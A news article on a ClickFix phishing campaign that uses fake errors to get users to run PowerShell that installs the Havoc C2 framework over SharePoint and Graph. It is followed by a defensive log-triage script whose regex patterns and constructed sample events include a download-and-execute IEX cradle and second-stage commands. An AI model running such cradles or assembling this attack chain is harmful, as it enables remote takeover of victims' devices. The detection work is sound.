New ClickFix attack deploys Havoc C2 via Microsoft Sharepoint – BleepingComputer

A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands that deploy the Havoc post-exploitation framework for remote access to compromised devices.

ClickFix is a social-engineering tactic that emerged last year, where threat actors create websites or phishing attachments that display fake errors and then prompt the user to click a button to fix them.

Clicking the button copies a malicious PowerShell command into the Windows clipboard, and users are then prompted to paste it into a command prompt to “fix” the error. However, as expected, the malicious PowerShell command instead executes a script hosted on a remote site that downloads and installs malware on the device.

In a new ClickFix campaign discovered by Fortinet’s FortiGuard Labs, threat actors are sending phishing emails stating that a “restricted notice” is available to review and that recipients should open the attached HTML document (‘Documents.html’) to view it.

When opened, the HTML displays a fake 0x8004de86 error, stating that it “Failed to connect to the ‘One Drive’ cloud service” and that users must fix the error by updating the DNS cache manually. Clicking the “How to fix” button automatically copies a PowerShell command to the Windows clipboard and then displays instructions on how to execute it.

This PowerShell command attempts to launch another PowerShell script hosted on the threat actor’s SharePoint server.

FortiGuard says the script checks whether the device is in a sandbox environment by querying the number of devices in the Windows domain. If it determines it is in a sandbox, the script terminates.

Otherwise, the script modifies the Windows Registry to add a value indicating that the script has run on the device. It then checks whether Python is installed on the device and, if not, installs the interpreter.

Finally, a Python script is downloaded from the same SharePoint site and executed to deploy the Havoc post-exploitation command-and-control framework as an injected DLL.

Havoc is an open-source post-exploitation framework similar to Cobalt Strike, allowing attackers to remotely control compromised devices. Threat actors commonly use post-exploitation frameworks like Havoc to breach corporate networks and then spread laterally to other devices on the network.

In this campaign, Havoc is configured to communicate back to the threat actor’s services through Microsoft’s Graph API, embedding malicious traffic within legitimate cloud services. By doing so, the attackers blend in with regular network communications to evade detection.

The malware uses SharePoint APIs on Microsoft Graph to send and receive commands, effectively transforming the attacker’s SharePoint account into a data exchange system.

ClickFix attacks have become increasingly popular among cybercriminals, who use them to deploy a wide variety of malware, including infostealers, DarkGate, and remote access trojans.

Threat actors have also begun to evolve the technique to use it on social media platforms like Telegram, where a fake identity verification service named ‘Safeguard’ was used to trick users into running PowerShell commands that install a Cobalt Strike beacon.
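The chain described in the article (a clipboard-pasted cradle, a second stage hosted on SharePoint, a domain-size sandbox check, a registry marker, a Python interpreter install, and Havoc talking to Microsoft Graph) leaves traces in PowerShell ScriptBlock logging (Event ID 4104). The following triage script is an added example written for this page, not code from the article, FortiGuard, or the Havoc project. Its stage patterns are generic, the sample log entries are constructed, and the specific cmdlets it looks for (Get-ADComputer, Set-ItemProperty, a python-*.exe installer) are assumptions about how the described behaviour would typically appear in a script block, not the campaign's actual script contents.

```python
"""Triage PowerShell ScriptBlock (Event ID 4104) text for ClickFix -> Havoc chain stages.

Added example for this page; not FortiGuard's, BleepingComputer's, or Havoc's code.
The patterns are generic detection heuristics; the sample events are constructed.
"""
import re
from dataclasses import dataclass, field

# One entry per stage the article describes, with case-insensitive regexes that
# match how that stage commonly shows up in a script block. The cmdlet names are
# assumptions about typical tradecraft, not the campaign's real script.
STAGE_PATTERNS = {
    "remote_script_cradle": [
        r"\b(iex|invoke-expression)\b.*\b(downloadstring|invoke-webrequest|iwr|invoke-restmethod|irm)\b",
        r"\b(downloadstring|invoke-webrequest|iwr|invoke-restmethod|irm)\b.*\b(iex|invoke-expression)\b",
    ],
    "sharepoint_hosted_payload": [r"https?://[\w.-]+\.sharepoint\.com/"],
    "domain_size_sandbox_check": [
        r"\bget-adcomputer\b",
        r"objectcategory=computer",
        r"\.count\s*-l[te]\s*\d+",
    ],
    "registry_run_marker": [
        r"\b(set-itemproperty|new-itemproperty|reg(\.exe)?\s+add)\b.*\bhk(cu|lm)\b",
    ],
    "python_interpreter_install": [r"python-[\d.]+.*\.exe", r"\bpython\.exe\b"],
    "graph_api_c2": [r"https?://graph\.microsoft\.com/"],
}


@dataclass
class TriageResult:
    event_id: int
    stages: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        # A cradle pulling from SharePoint, or three or more stages in one block,
        # is the signature of the chain; a single indicator alone is weak evidence.
        if ("remote_script_cradle" in self.stages and "sharepoint_hosted_payload" in self.stages) \
                or len(self.stages) >= 3:
            return "high"
        if len(self.stages) == 2:
            return "medium"
        return "low" if self.stages else "none"


def triage_scriptblock(event_id: int, script_text: str) -> TriageResult:
    # Collapse whitespace so multi-line cradles and split commands still match.
    text = " ".join(script_text.split())
    hits = [stage for stage, patterns in STAGE_PATTERNS.items()
            if any(re.search(p, text, re.IGNORECASE) for p in patterns)]
    return TriageResult(event_id, hits)


def triage_log(events) -> list:
    """events: iterable of (event_id, script_text). Returns only results with hits."""
    return [r for r in (triage_scriptblock(i, t) for i, t in events) if r.stages]


# Constructed sample events; the tenant and paths are placeholders.
SAMPLE_EVENTS = [
    # The kind of one-liner a ClickFix page places on the clipboard.
    (4104, "IEX (New-Object Net.WebClient).DownloadString('https://contoso.sharepoint.com/sites/docs/s.ps1')"),
    # A second stage matching the article's description (assumed cmdlets).
    (4104, """
        $n = (Get-ADComputer -Filter *).Count
        if ($n -lt 10) { exit }
        Set-ItemProperty -Path 'HKCU:\\Software\\Placeholder' -Name 'ran' -Value 1
        Invoke-WebRequest 'https://contoso.sharepoint.com/sites/docs/python-3.12.0-amd64.exe' -OutFile $env:TEMP\\py.exe
        & "$env:LOCALAPPDATA\\Programs\\Python\\python.exe" stage.py
    """),
    # Benign admin activity: produces no hits and is dropped from the output.
    (4104, "Get-ChildItem C:\\Windows\\Temp | Remove-Item -Force"),
    # Legitimate Graph API use: a single indicator only, so verdict is 'low'.
    (4104, "Invoke-RestMethod -Uri 'https://graph.microsoft.com/v1.0/me' -Headers $headers"),
]

if __name__ == "__main__":
    for result in triage_log(SAMPLE_EVENTS):
        print(result.event_id, result.verdict, result.stages)
```

The verdict deliberately downgrades single hits: Graph API calls and SharePoint downloads are everyday traffic in a Microsoft 365 tenant, so the value of this check comes from seeing several of the article's stages together in one script block, not from any one pattern.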